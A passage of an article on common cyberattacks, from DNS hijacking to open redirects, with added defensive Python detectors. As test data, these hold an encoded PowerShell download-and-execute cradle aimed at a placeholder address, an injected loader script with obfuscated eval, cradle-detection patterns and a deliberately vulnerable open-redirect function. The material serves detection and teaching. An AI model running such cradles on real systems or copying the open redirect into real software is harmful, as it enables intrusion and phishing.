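LINE = re.compile(r"client=(\S+) qname=(\S+) qtype=(\S+) req=(\d+) resp=(\d+)")


def amplification_report(log_text):
    """Per client: query count, ANY count and bytes out / bytes in (the amplification factor)."""
    stats = defaultdict(lambda: {"queries": 0, "any_queries": 0, "req_bytes": 0, "resp_bytes": 0})
    for line in log_text.splitlines():
        m = LINE.search(line)
        if not m:
            continue
        client, _qname, qtype, req, resp = m.groups()
        s = stats[client]
        s["queries"] += 1
        s["any_queries"] += 1 if qtype == "ANY" else 0
        s["req_bytes"] += int(req)
        s["resp_bytes"] += int(resp)
    for s in stats.values():
        s["ratio"] = s["resp_bytes"] / s["req_bytes"] if s["req_bytes"] else 0.0
    return dict(stats)


def flag_reflection_abuse(report, min_queries=20, min_ratio=10.0):
    """Clients whose traffic looks like a reflection flood: many queries that each return
    far more data than they send. Such a client is most likely the victim whose address
    is being spoofed, so the right response is rate limiting toward that address
    (or refusing ANY), not treating the address as the attacker."""
    return sorted(
        client for client, s in report.items()
        if s["queries"] >= min_queries and s["ratio"] >= min_ratio
    )


if __name__ == "__main__":
    report = amplification_report(SAMPLE_LOG)
    for client, s in report.items():
        print(f'{client}: {s["queries"]} queries, {s["any_queries"]} ANY, amplification x{s["ratio"]:.1f}')
    print("flagged:", flag_reflection_abuse(report))
```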
An attempt at DNS hijacking occurred against Celer Network, a cross-chain bridge and interoperability protocol, towards the end of 2022.
Users were finally led to phishing smart contracts on Avalanche, Ethereum, and Polygon by the hijack of their cBridge user interface, which eventually depleted their account balance.
What is essential to know:
Because DNS is essential to routing web traffic, it is sometimes called the internet’s phonebook, and also its Achilles heel. DNS is the protocol that maps domain names to IP addresses, and it has performed admirably for its intended purpose. However, DNS is notoriously attack-prone, partly because of its distributed architecture.
DNS is built on loosely structured connections, over intrinsically insecure protocols, between millions of clients and servers.
There is no denying the seriousness and significance of protecting DNS from intrusions. A hacked DNS can have terrible consequences. Hackers have the ability to take down a whole company in addition to obtaining login credentials, emails, and private data.
How the attack operates: Hackers take advantage of the way DNS interacts with a web browser to carry out their attack.
The system works like a phone book, translating a domain such as NYTimes.com into an IP address.
Having determined which server, anywhere in the world, hosts that website, DNS routes traffic to it. When an attacker manages to interfere with a DNS lookup, they can either take the website down or divert visitors to another website under their control.
Where the attack originates: The origin is hard to pin down, mainly because a DNS hijacker can carry out an attack as easily as a social engineering attack in which someone calls a domain provider and deceives them into altering a DNS record.
Over the past few years, a hacker organization known as OilRig has regularly attacked multiple Middle Eastern governments and companies using a range of tools and techniques. It uses DNS tunneling to keep a connection open between its command-and-control server and the system it is assaulting in order to impede regular operations and steal data.
What is essential to know:
The Domain Name System (DNS) is the mechanism that converts the URLs entered into web browsers into numerical IP addresses; think of DNS as the internet’s equivalent of a phone directory. Because DNS was not designed for data transfer, its traffic is frequently left unmonitored and open to attacks such as DNS tunneling, in which an attacker embeds malicious data into a DNS query (as a long string of characters prepended to a domain name).
DNS tunneling does have legitimate uses; antivirus vendors, for instance, use it to quietly push updated malware profiles to their clients. Because of this possible legitimate use, organizations should monitor their DNS traffic carefully so that only trusted traffic is allowed across the network.
How the attack works: By rerouting traffic to their own server and creating a link to an organization’s network, an attacker can circumvent security measures (tunneling under or around them, as it were). Once the link is established, a variety of assaults, including command and control and data exfiltration, are feasible.
Where the attack originates:
Although DNS tunneling programs are easily downloadable, attackers need more advanced understanding if they want to go beyond simply getting past a hotel or airline paywall to reach the internet.
DNS is also a very slow data transport channel, because it was created primarily to resolve web addresses.
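The monitoring the section above calls for comes down to spotting query names that carry data rather than name a host. The following added example (not code from the article; the query names are constructed and the thresholds are assumptions to be tuned against a real baseline) scores each registered domain on three tunnel symptoms, many unique subdomains, over-long labels, and high-entropy labels, and reports the domains that match.

```python
"""Heuristic DNS tunneling detector over a list of queried names.

Added example, not code from the article. The query names are constructed; the
thresholds are assumptions to be tuned against a real baseline.
"""
import hashlib
import math
from collections import defaultdict


def shannon_entropy(s):
    """Bits per character; encoded payloads score high, real host names low."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def split_name(qname):
    """Return (subdomain_part, registered_domain).

    Simplification: treats the last two labels as the registered domain; real
    code should consult the public suffix list (co.uk and the like)."""
    labels = qname.rstrip(".").split(".")
    if len(labels) <= 2:
        return "", ".".join(labels)
    return ".".join(labels[:-2]), ".".join(labels[-2:])


def score_domains(qnames, max_sub_len=52, entropy_threshold=3.5, min_unique=5):
    """Registered domains whose subdomains look like carried data:
    many unique names, over-long labels, or high-entropy labels."""
    stats = defaultdict(lambda: {"unique": set(), "long": 0, "high_entropy": 0})
    for q in qnames:
        sub, dom = split_name(q)
        st = stats[dom]
        st["unique"].add(sub)
        if len(sub) > max_sub_len:
            st["long"] += 1
        if shannon_entropy(sub.replace(".", "")) > entropy_threshold:
            st["high_entropy"] += 1
    suspects = {}
    for dom, st in stats.items():
        enough = len(st["unique"]) >= min_unique
        if enough and (st["long"] > 0 or st["high_entropy"] >= min_unique):
            suspects[dom] = {
                "unique_subdomains": len(st["unique"]),
                "long_labels": st["long"],
                "high_entropy": st["high_entropy"],
            }
    return suspects


# Constructed sample: ordinary names under example.com, and six queries that each
# carry 64 hex characters under example.net (the shape of a tunnel client's uploads).
NORMAL_QUERIES = [f"{l}.example.com" for l in ("www", "mail", "api", "cdn")] + ["example.com"]
TUNNEL_QUERIES = [
    f"{hashlib.sha256(f'chunk{i}'.encode()).hexdigest()}.t.example.net" for i in range(6)
]
SAMPLE_QUERIES = NORMAL_QUERIES + TUNNEL_QUERIES

if __name__ == "__main__":
    print(score_domains(SAMPLE_QUERIES))
```

The legitimate uses mentioned above (vendor update channels) will also score on this rule, which is why the output is a review list per domain rather than a block decision; known-good domains go on an allowlist in front of it.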
Over 20 years ago, one of the most well-known denial-of-service (DoS) attacks was carried out by a 16-year-old hacker known as Mafiaboy. It brought down multiple popular websites, including CNN, eBay, Amazon, and Yahoo. Mafiaboy reportedly broke into numerous networks to install malware designed to overwhelm targets with attack traffic. Because many sites were ill-prepared for such an attack, it lasted almost a week while the targeted organizations scrambled to figure out what had happened and how to get back online. After being apprehended, Mafiaboy received a juvenile detention sentence.
Twenty years later, denial-of-service (DoS) attacks, many of them distributed denial-of-service (DDoS) attacks orchestrated by hackers, hacktivists, or cyber spies to bring down websites and online services, are becoming more frequent and are one of the most common types of attack that organizations encounter; by 2022, DDoS attacks are expected to grow by 150% globally.
What you should know: Denial-of-service (DoS) attacks occur when hackers render a network or machine unusable for the people who intended to use it. DoS attacks can be carried out by delivering information that causes a system to slow down or crash entirely, or by flooding networks with traffic. Similar to DDoS attacks, DoS attacks typically target well-known companies or those with widely accessible websites, like banks, e-commerce sites, media outlets, or government agencies. DoS attacks cause significant harm to the victim, including loss of revenue, reputation, security and cleaning expenses, and customer attrition. They also prevent genuine customers from accessing the service they desire.
How the attack happens: A denial-of-service attack can take a targeted network down in one of two ways, by flooding it or by crashing it. In flood attacks, cybercriminals overload victim machines with traffic, forcing them to slow down or shut down completely. Buffer overflow, ICMP, and SYN flood attacks are a few examples.
By stopping customers from reaching a website or network resource, DDoS attackers aim to cause havoc for their targets, damage web properties, harm brand reputation, and cause financial losses. DDoS makes use of hundreds or even thousands of compromised “bot” computers spread across the globe. These hordes of infected machines, known as “botnets,” carry out the attack simultaneously for maximum impact.
Where the attack is coming from: Denial-of-service (DoS) attacks can come from anywhere in the world. By hiding their whereabouts, attackers can carry out malicious activity, take control of victim machines, install malware, and commit other acts with some confidence that they will not be discovered.
DDoS attacks, as their name suggests, are distributed: a multitude of sources contribute to the deluge of traffic directed at the victim’s network. As a result, the attackers behind them can be located anywhere in the world, and because of this distributed nature the attack cannot be stopped by protecting against or blocking a single source.
When a phony Google Play Protect overlay appeared in January 2020, users of the venerable blog and magazine site Boing Boing were prompted to download a malicious APK that installed a banking Trojan on their Android devices. It showed up as a (fake) Adobe Flash installation page that spread other malicious apps to Windows users. The content management system of Boing Boing had been compromised. JavaScript that was injected into the page automatically started the drive-by downloads, even if the visitor declined the bait. Although Boing Boing was able to identify the attack and take down the script rather quickly, the consequences might have been catastrophic considering the five million unique visitors to the website, including former President Barack Obama.
What is essential to know:
A drive-by download is when malicious code finds its way onto a computer or mobile device without the user intending to install anything, exposing the user to various hazards. Drive-by downloads are a common tool used by cybercriminals to infect devices with malware, install banking Trojans, steal and gather personal information, and more. To guard against them, regularly update or patch systems with the most recent versions of applications, browsers, and operating systems, and avoid unreliable or potentially dangerous websites.
How the attack takes place:
Drive-by downloads are unique in that users do not have to click on any links in order for the download to begin. A website can be accessed or browsed to initiate the download. Without the user’s awareness, the malicious code is intended to download harmful files onto the victim’s device.
Drive-by downloads exploit outdated, unpatched, or otherwise vulnerable browsers, plug-ins, applications, or even operating systems.
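In the Boing Boing case above the delivery vehicle was JavaScript injected into the site’s own pages, so one defender-side check is to diff the scripts a page actually serves against the set the site owner expects. The following added example (not code from the article or from Boing Boing; the allowlist, the sample page and the token list are constructed assumptions) parses a page, flags external scripts from hosts outside the allowlist, and flags inline scripts that use the decoding and evaluation primitives injected loaders rely on.

```python
"""Audit the <script> tags a page actually serves against an allowlist.

Added example, not code from the article or from Boing Boing. The allowlist,
the sample page and the token list are constructed assumptions.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

ALLOWED_SCRIPT_HOSTS = {"cdn.example.com", "www.example.com"}  # constructed allowlist
# Primitives that injected loaders lean on to hide their real payload.
SUSPICIOUS_TOKENS = ("eval(", "unescape(", "fromCharCode", "document.write(", "atob(")

# Constructed page: two expected scripts, one from an unlisted host, one
# obfuscated inline script (it only decodes "hello") and one harmless inline script.
SAMPLE_PAGE = """<html><head>
<script src="https://cdn.example.com/app.js"></script>
<script src="/static/site.js"></script>
<script src="https://203.0.113.9/loader.js"></script>
<script>var p=atob("aGVsbG8=");eval(p);</script>
<script>console.log("ok");</script>
</head><body></body></html>"""


class ScriptCollector(HTMLParser):
    """Collects external script sources and inline script bodies."""

    def __init__(self):
        super().__init__()
        self.external = []
        self.inline = []
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_script = True
            self._buf = []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_script:
            self.inline.append("".join(self._buf))
            self._in_script = False


def audit_scripts(html, allowed_hosts=ALLOWED_SCRIPT_HOSTS):
    """Return (kind, detail) findings for scripts the site owner did not expect."""
    p = ScriptCollector()
    p.feed(html)
    p.close()
    findings = []
    for src in p.external:
        host = urlparse(src).hostname
        if host is None:  # relative URL: same origin as the page
            continue
        if host not in allowed_hosts:
            findings.append(("external-unlisted", src))
    for body in p.inline:
        hits = [t for t in SUSPICIOUS_TOKENS if t in body]
        if hits:
            findings.append(("inline-obfuscation", ",".join(hits)))
    return findings


if __name__ == "__main__":
    for kind, detail in audit_scripts(SAMPLE_PAGE):
        print(kind, detail)
```

The same allowlist is what a Content-Security-Policy script-src directive would enforce in the browser; the audit is the offline check that the policy and the page still agree after a content management system compromise like the one described above.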
Where the attack originates:
These attacks can be carried out by hackers of any experience level because of the proliferation of prepackaged drive-by download kits. The attacker does not need to write their own code or set up their own infrastructure; they can buy a kit and use it for data exfiltration or other abuses.
Because they are so simple to carry out, these attacks can originate almost anywhere.
Retaliation. The story is as old as time. In 2022 an IT specialist was charged with allegedly breaking into a Chicago healthcare organization’s server, to which he had gained access as a contractor.
After being turned down for a position at the company, he was let go by the contracting IT firm a few months later; that gave him his motive. This act of personal revenge led to a hack that severely affected numerous patients’ medical examinations, treatments, and diagnoses. If found guilty, the attacker could spend up to ten years in federal prison.
What is essential to know:
A malicious attack carried out by insiders with permission to access your bank’s computer system, network, and resources is known as an insider threat attack. Attackers frequently seek to steal sensitive, proprietary, or confidential data and assets in this kind of attack, either for their own benefit or to provide rival businesses access to the information. They might also attempt to damage your company’s brand, productivity, and revenue by causing system disruptions.
How the attack is carried out:
Malevolent insiders have a clear advantage because they already have access to the assets, data, and network of your firm. They might gain access to vital systems or data through accounts that make it simple for them to find it, get beyond security measures, and send it outside the company.
Where the attack originates:
Inside spies may pose as contractors, outside parties, or remote workers, or they may be ill-intentioned employees of the company. They might operate alone or as a part of rival groups, nation-states, or criminal networks. Even though they may also be far-flung outside contractors or suppliers, they often have some sort of authorized access to the company’s systems and data.
Following the discovery of a data breach that compromised the private data of more than 3,000 customers of Ring, an Amazon-owned home security company, cybercriminals exploited the breach to take control of smart cameras and video doorbells.
Because of their Ring devices, thousands of companies are still at risk; according to researchers, these confirmed attacks are only the beginning. Since then, Ring has added end-to-end video encryption to help guard against future intrusions, but these kinds of attacks won’t stop because IoT devices are becoming more and more common.
What you should know: By 2030, there will likely be 30 billion linked IoT devices worldwide, up from the current estimate of 15.14 billion. These devices frequently lack security infrastructure, which leaves the network with obvious weaknesses that increase the attack surface and make it more vulnerable to malware. Threats posed by social engineering, ransomware, and DDoS attacks can all be transmitted through IoT devices.
How the attack is carried out: Hackers and hostile nation-states can employ sophisticated malware to exploit security holes in networked IoT devices, gain access to a network, and monitor users or steal confidential or personally identifiable information. Once they have breached an IoT system, attackers can use that access to move laterally across connected devices or into a larger network for a variety of malicious objectives.
Attack origin: An attack might originate from any location on the planet.
However, because a large number of verticals, including the government, business, and healthcare sectors, are implementing IoT infrastructure without the necessary security safeguards, these systems are vulnerable to assaults from hostile nation-states and highly skilled cybercrime groups. Attacks on linked civic or healthcare systems, as opposed to those against technological infrastructure, have the potential to cause widespread disruption, fear, and even human endangerment.
The Melissa virus, which made headlines in the late 1990s and is considered one of the most notorious virus incidents ever, was a macro virus. A Melissa-infected PC would take over the user’s Microsoft Outlook email account and send malicious emails to the first 50 addresses in the user’s mailing lists. The virus spread incredibly quickly and caused great damage all across the world, with cleanup and network repairs alone costing an estimated $80 million. Even if the peak of the macro virus may have passed, these attacks continue, and they are no longer limited to Microsoft Windows users: recent attacks have also targeted Mac users.
What you need to know: A macro virus is a computer virus written in the same macro language as the software applications it targets. Because certain software, such as Microsoft Office, Excel, and PowerPoint, allows macro programs to be embedded in documents so that they run automatically when the document is opened, harmful instructions have a unique way to spread.
For this reason, opening emails with unexpected attachments or from senders you are not familiar with can be risky. Although a lot of antivirus software can identify macro infections, it can still be challenging to identify their activity.
How the attack is carried out: Phishing emails with infected attachments are frequently used to spread macro viruses. Many recipients open the email because it appears to come from a reliable source. Once a malicious macro has run, it can spread to and infect all other documents on the user’s PC. Macro viruses propagate every time a user opens or closes an infected document; they are run by applications rather than by operating systems. Opening an email attachment and exchanging files over a network are the most common ways for macro viruses to spread.
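The infected attachments described above can be recognised before anyone opens them: a modern Office document is a zip archive, and a macro-enabled one carries a vbaProject.bin part and declares the matching content type. The following added example (not code from the article; the sample files are constructed in memory and are not real Word documents) inspects an attachment for those markers and also reports when a file whose name promises no macros (.docx, .xlsx, .pptx) nevertheless contains a VBA project.

```python
"""Detect embedded VBA in Office Open XML mail attachments.

Added example, not code from the article. Sample files are constructed in memory
and are not real Word documents; the part names follow the OOXML layout
(word/vbaProject.bin and the vbaProject content type).
"""
import io
import zipfile

MACRO_PART_NAMES = ("word/vbaProject.bin", "xl/vbaProject.bin", "ppt/vbaProject.bin")
MACRO_CONTENT_TYPE = "application/vnd.ms-office.vbaProject"
PLAIN_EXTENSIONS = (".docx", ".xlsx", ".pptx")  # macro-free by convention


def build_sample_doc(with_macro):
    """Constructed stand-in for a document: a zip holding the parts we inspect."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        ct = '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
        if with_macro:
            ct += f'<Override PartName="/word/vbaProject.bin" ContentType="{MACRO_CONTENT_TYPE}"/>'
            z.writestr("word/vbaProject.bin", b"\xd0\xcf\x11\xe0 placeholder OLE stream")
        ct += "</Types>"
        z.writestr("[Content_Types].xml", ct)
        z.writestr("word/document.xml", "<w:document/>")
    return buf.getvalue()


def inspect_attachment(data, filename):
    """Report whether a VBA project is present and whether the file name hides it."""
    findings = {"is_zip": False, "has_macro": False, "extension_mismatch": False, "reasons": []}
    if not zipfile.is_zipfile(io.BytesIO(data)):
        return findings  # legacy .doc (OLE) files need a different parser
    findings["is_zip"] = True
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        names = set(z.namelist())
        if any(n in names for n in MACRO_PART_NAMES):
            findings["has_macro"] = True
            findings["reasons"].append("vbaProject.bin part present")
        if "[Content_Types].xml" in names:
            ct = z.read("[Content_Types].xml").decode("utf-8", "replace")
            if MACRO_CONTENT_TYPE in ct:
                findings["has_macro"] = True
                findings["reasons"].append("macroEnabled content type declared")
    if findings["has_macro"] and filename.lower().endswith(PLAIN_EXTENSIONS):
        findings["extension_mismatch"] = True  # VBA inside a name that promises none
    return findings


if __name__ == "__main__":
    print(inspect_attachment(build_sample_doc(True), "invoice.docx"))
    print(inspect_attachment(build_sample_doc(False), "invoice.docx"))
```

A mail gateway would quarantine or strip the macro on a positive result; the check is cheap because it reads only the zip directory and one small XML part, never the macro code itself.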
Where the attack originates:
Macro viruses are less common in malicious campaigns now that antivirus software can detect and stop them more effectively, but they still pose a serious threat. A quick Google search for “macro virus” turns up instructions for making them as well as resources that help non-coders create them. In theory, anyone with internet access could easily construct a macro virus.
Top cybercriminals and cyberespionage organizations are generally drawn to attack sequences that take advantage of the widely used PowerShell because they facilitate the spread of malware throughout a network. PowerShell scripts are used by infamous bad actors like APT29 (also known as Cozy Bear) to obtain vital information that helps them plan even more intricate cyberattacks. The infamous threat group APT35, also known as “Charming Kitten,” exploited PowerShell in 2020 to gather and steal data from a local government in the United States and to launch a ransomware attack on a charitable organization.
What you need to know: PowerShell is a Microsoft command-line and scripting tool built on .NET (pronounced “dot net”) that enables users and administrators to automate processes and modify system settings. Because of its versatility and array of tools, the command-line interface (CLI) is a widely used shell and scripting language. The benefits of PowerShell, such as the ability to operate covertly on a system as a code endpoint and carry out operations in the background, have also been noticed by bad actors.
How the attack takes place:
Given that most workplace computers have PowerShell available and that most businesses do not keep an eye on code endpoints, the reasoning behind this kind of attack is rather evident. Accessing the system is simple, and it is even simpler for attackers to establish a foothold there. The harmful script does not need any installed malware in order to run. This means the attacker can easily evade detection and avoid having executable files analyzed, leaving them free to act whenever they choose.
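The “nobody is watching code endpoints” point above is exactly what process command-line logging addresses: PowerShell run by an attacker tends to be launched with an encoded command, a hidden window, no profile, and a download cradle, and each of those is visible in the command line. The following added example (not code from the article; the telemetry records are constructed and the pattern list is an assumption) decodes -EncodedCommand payloads and scores each event on those indicators plus an Office parent process.

```python
"""Flag suspicious PowerShell command lines from process-creation telemetry.

Added example, not code from the article. The event records are constructed; the
indicator patterns are a starting point, not a vendor's rule set.
"""
import base64
import re

# Constructed payload for the second event: a typical download cradle pointing at
# a TEST-NET address. Encoded the way -EncodedCommand expects (UTF-16LE, base64).
_CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/a.ps1')"
_ENCODED = base64.b64encode(_CRADLE.encode("utf-16le")).decode()

# Hypothetical telemetry: (pid, parent_image, command_line)
SAMPLE_EVENTS = [
    (4101, "explorer.exe", "powershell.exe -NoProfile -File C:\\scripts\\backup.ps1"),
    (4102, "WINWORD.EXE", "powershell.exe -nop -w hidden -enc " + _ENCODED),
    (4103, "cmd.exe", "powershell.exe Get-Process | Sort-Object CPU"),
]

FLAG_PATTERNS = {
    "hidden-window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "no-profile": re.compile(r"-nop(?:rofile)?\b", re.I),
    "download-cradle": re.compile(
        r"DownloadString|DownloadFile|Invoke-WebRequest|\bIWR\b|\bIEX\b|Invoke-Expression", re.I),
    "bypass-policy": re.compile(r"-ep\s+bypass|-ExecutionPolicy\s+Bypass", re.I),
}
# -e, -ec, -enc and -EncodedCommand all take a base64 blob.
ENC_RE = re.compile(r"-e(?:ncodedcommand|nc|c)?\s+([A-Za-z0-9+/=]+)", re.I)
OFFICE_PARENTS = {"WINWORD.EXE", "EXCEL.EXE", "POWERPNT.EXE", "OUTLOOK.EXE"}


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if there is none."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_event(parent_image, cmdline):
    """List the indicators present; patterns run over the decoded payload too."""
    reasons = []
    text = cmdline
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        reasons.append("encoded-command")
        text = cmdline + " " + decoded
    for name, pat in FLAG_PATTERNS.items():
        if pat.search(text):
            reasons.append(name)
    if parent_image.upper() in OFFICE_PARENTS:
        reasons.append("office-parent")  # a document spawning a shell
    return reasons


def triage(events, min_indicators=2):
    """Return {pid: reasons} for events carrying at least min_indicators."""
    hits = {}
    for pid, parent, cmd in events:
        reasons = score_event(parent, cmd)
        if len(reasons) >= min_indicators:
            hits[pid] = reasons
    return hits


if __name__ == "__main__":
    for pid, reasons in triage(SAMPLE_EVENTS).items():
        print(pid, reasons)
```

The administrator’s backup job (event 4101) scores only on -NoProfile and is left alone; the Word-spawned, hidden, encoded cradle (event 4102) scores on five indicators. Script Block Logging (event 4104) gives the same visibility for code that never appears on the command line.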
Where the attack originates:
Compared with other approaches, this kind of attack is more complex and is typically carried out by a skilled attacker (as opposed to a novice who might resort to brute force attacks).
They always approach with subtlety, are skilled at hiding their tracks, and are able to move laterally through a network.
Emotet is a form of malware that was first discovered in 2014 as a banking trojan aimed at consumers. It has since evolved into a persistent and widespread threat to both the public and private sectors. According to the Department of Homeland Security, Emotet is among the most expensive and harmful malware varieties, with an average cost of $1 million per incident.
Emotet has targeted private sector businesses in the manufacturing, financial services, pharmaceutical, and technology sectors, as well as government organizations in France, Japan, Canada, and New Zealand. In February 2021, law enforcement agencies from the United States and Europe disrupted communications on the Emotet network, halting its spread. In 2023, Emotet reappeared and the botnet resumed its activities.
What you need to know: Many kinds of malware give an attacker unauthorized remote access to a target’s device, backdoor administrative control, and the ability to spy on it. After taking over the targeted machine or machines, the attackers can alter files, install and uninstall applications, take over webcams, and steal sensitive information such as login credentials. Hackers might also pose as legitimate users in order to quickly download more malware and compromise other computers and devices on the network.
How the attack takes place:
Advanced phishing strategies are used to propagate malware, which is made to steal sensitive data such as user credentials, screenshots, webcam access, audio, geolocation, and keylogging information. One of their most popular phishing strategies involves tricking people into opening files disguised as Word and PowerPoint documents from Microsoft Office. In addition to conventional remote service-based exploitation, attackers can now use spearphishing operations and drive-by downloads to infect businesses with malware.
Where the attack originates: This strategy is both sophisticated and widespread because malware itself is so widely used. Before opening any dubious-looking email with an attachment, make sure it comes from a reliable source, since opening it could introduce malware into your network.
Early in 2022, Microsoft found evidence of a phishing campaign aimed at Office 365 users. The attackers collected login credentials with a fake Office 365 login page, then used and abused them.
In order to accomplish this, the attackers hijacked the authentication process using an Evilginx2 phishing kit, a man-in-the-middle (MITM) attack framework used for phishing login credentials along with session cookies, allowing bad actors to overcome two-factor verification. In their blog post, Microsoft also stated, “Remember that this is not a vulnerability in MFA; the attacker gets authenticated to a session on the user’s behalf, regardless of the sign-in method the latter uses, since AiTM phishing steals the session cookie.”
What you should know: An adversary-in-the-middle (AiTM) attack, also called an MITM attack, involves the setup of a proxy server that intercepts the victim’s log-in session. This allows the malicious actor to act as a relay between the two parties or systems, allowing them to access and/or steal confidential data. With this kind of attack, a malevolent actor can send and receive data that is meant for someone else or isn’t meant to be sent at all, all without the other party’s knowledge until it is too late.
How the attack is carried out: A man-in-the-middle attack can be carried out by almost anybody. However, since HTTPS Everywhere was put into place, these attacks have become harder to carry out and, as a result, less common. In a man-in-the-middle (MITM) attack, the attacker sits between the user and the legitimate website, or another user, relaying data between them and extracting whatever they want from the exchange.
Where the attack originates: Only experienced hackers or state actors are attempting MITM attacks these days due to the increased difficulty of executing them brought about by security technology advancements. Four members of the Russian hacker outfit Fancy Bear were discovered by the Dutch police in 2018 parked outside the Organization for the Prohibition of Chemical Weapons in Holland, attempting to obtain employee credentials through an MITM penetration. The Russian state-sponsored actors were actively targeting routers in homes and businesses with the intention of MITM exfiltration, the US and UK governments warned later that year.
Con artists frequently pose as representatives of software businesses to trick unsuspecting people into installing malicious software delivered as email attachments. Adobe and Microsoft were involved in one recent trend. Avast, a well-known antivirus and security business, revealed in early 2023 that “scammers send out Microsoft OneNote files as email attachments to victims, triggering malware downloads when someone opens the attachment.” Masquerade attacks have been increasing ever since.
What you should know: A masquerade attack occurs when a malevolent actor obtains unauthorized access to a person’s computer or an organization’s network by using a lawful access identifier that has been fabricated or stolen. Masquerade attacks have the potential to grant attackers access to the whole network, depending on the level of access granted by the permissions.
How the attack occurs: It is possible for a masquerade attack to occur as a result of stolen user credentials or as a result of authenticating on unsecured computers and devices that are connected to the target network.
Where the attack originates: By utilizing keyloggers to obtain authentic authentication credentials or by impersonating login domains, attackers can gain access from an insider perspective. Physical attacks can also occur when attackers prey on people who leave their computers unattended, such as when a colleague uses a victim’s laptop while they’re away. Generally speaking, the root of the issue is typically inadequate authentication techniques that are easily exploited by outside parties.
The majority of cybersecurity attacks take advantage of a weakness, either a coding error or poor design. However, not every attack is created equal. Two Google researchers found a new kind of attack, Meltdown and Spectre, that may expose billions of devices and affects all computer chip manufacturers.
What you should know: The Meltdown and Spectre attacks exploit vulnerabilities in computer processors. Attackers can use these flaws to steal virtually any data the machine is processing. The attack targets the fundamentals of computer security, which depend on memory isolation to safeguard user data. “Spectre” denotes a breakdown of the isolation between two applications that hide information from one another, whereas “Meltdown” denotes the failure of the protective barrier between an operating system and a program.
How the attack takes place:
Meltdown and Spectre take advantage of serious flaws in contemporary CPUs that let unauthorized code read data stored in memory.
The exploit violates the standard computing practice that prohibits programs from reading data from other programs. Passwords kept in a browser or password manager, emails, bank statements, and private data like images and instant chats are the kinds of data that hackers usually target. However, this assault is not just happening on desktop PCs. It can target nearly any processor-equipped device, including tablets and smartphones.
Where the attack originates: A Spectre or Meltdown attack might come from almost anywhere, and most of the research done so far has concentrated on the distinctive characteristics of the attack rather than on its perpetrator.
A new breed of gadget, the smart lock, is designed to protect your house and make it easier to enter with a single button click, or, perhaps more accurately, a touch.
However, security specialists have shown that securing your home in this more futuristic manner can have detrimental effects. One smart lock, not quite living up to its billing as the “smartest lock ever,” allowed the network traffic between its mobile app and the lock itself to be intercepted. Even more worrying, cheap and easily obtained network-sniffing devices suffice to do it.
What is essential to know:
Network sniffing, also referred to as packet sniffing, is the process of capturing, monitoring, and analyzing data as it moves within a network in real time. Malicious actors use sniffing tools to intercept unencrypted data from network packets, including passwords, emails, messages, and other sensitive information. They can do this with hardware, software, or a combination of both.
How the attack works: Network sniffing operates in the background, surreptitiously listening in as information is transmitted between entities on a network, much like wiretapping scenarios in which someone listens in on phone calls for crucial facts. This occurs when an attacker installs software or plugs in hardware to set up a sniffer on a network, enabling it to log and intercept traffic via any wired or wireless network that the host device is connected to.
Because most networks are complicated, sniffers can remain on the network for a very long time before being discovered.
The source of the attack: Businesses that require network traffic verification, such as ISPs, advertising firms, government agencies, and others, frequently engage in lawful network sniffing.
However, hackers acting for fun or nation-states attempting to steal intellectual property can also start it. Similar to ransomware, network sniffers can infiltrate a network by tricking the appropriate individual into clicking on the incorrect link. Access to sensitive hardware via insider threats may also serve as an attack vector.
In 2022, another phishing campaign targeting Facebook users was found to have obtained hundreds of millions of login credentials. The method was standard: a link is sent by direct message (DM) from a compromised Facebook account. The link then passes through a number of redirections, frequently via malvertising pages that earn the attacker views, clicks, and income, until it lands on a bogus page. Even though host redirection, sometimes referred to as open redirect, is not a novel approach, the scope of this campaign is astounding.
Out of over 400 phishing landing pages, researchers discovered that just one had 2.7 million visitors in 2021 and 8.5 million by June 2022. In an interview with researchers, the attacker claimed to make $150 for each thousand visits from US Facebook users. That would translate to total earnings of $59 million for the bad actor.
What you should know: As hackers get more inventive in how they entice their victims, host redirection attacks are becoming more frequent and disruptive.
Attackers use URL redirection to win a user’s trust before they eventually launch their attack. Usually, they will use phishing techniques, an .htaccess file, or embedded URLs to divert visitors to a malicious website.
How the attack is carried out: The hacker may send the gullible victim a phishing email that has a duplicate URL for the website. By completing any forms or prompts that may appear, visitors may unintentionally provide personal information if the website looks authentic. By including fictitious command-and-control domains in malware and displaying harmful information on domains that superficially resemble business servers, attackers can escalate this further.
Source of the attack: The target matters more than the attack’s origin. The usual target is an inexperienced internet user who will not notice that the URL of their preferred domain is misspelled by one or two letters. Furthermore, because of its simplicity this attack can come from practically anywhere; registering a domain name is all it takes to launch one.
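Both halves of the attack described above have a code-level defence on the site owner’s side: a redirect endpoint that only follows targets on its own hosts, and a check for domains that sit one or two edits away from the brand. The following added example (not code from the article; the trusted hosts, brand name and sample URLs are constructed) shows the open-redirect ‘before’ beside a hardened version that validates the parsed URL rather than a string prefix, and an edit-distance lookalike check for the one-or-two-letter misspellings the section mentions.

```python
"""Safe redirect validation and lookalike-domain detection.

Added example, not code from the article. Host names, brand and sample inputs
are constructed.
"""
from urllib.parse import urlparse

TRUSTED_HOSTS = {"www.example.com", "accounts.example.com"}  # constructed


def vulnerable_redirect(next_url):
    """The 'before' form: whatever the client sent becomes the Location header."""
    return next_url


def safe_redirect(next_url, trusted_hosts=TRUSTED_HOSTS, default="/"):
    """Return a Location value that stays on trusted hosts, else the default page."""
    if not next_url:
        return default
    # Scheme-relative (//host) and backslash forms that browsers normalise to a
    # host are rejected outright rather than parsed.
    if next_url.startswith(("//", "/\\", "\\")):
        return default
    parsed = urlparse(next_url)
    if parsed.scheme == "" and parsed.netloc == "":
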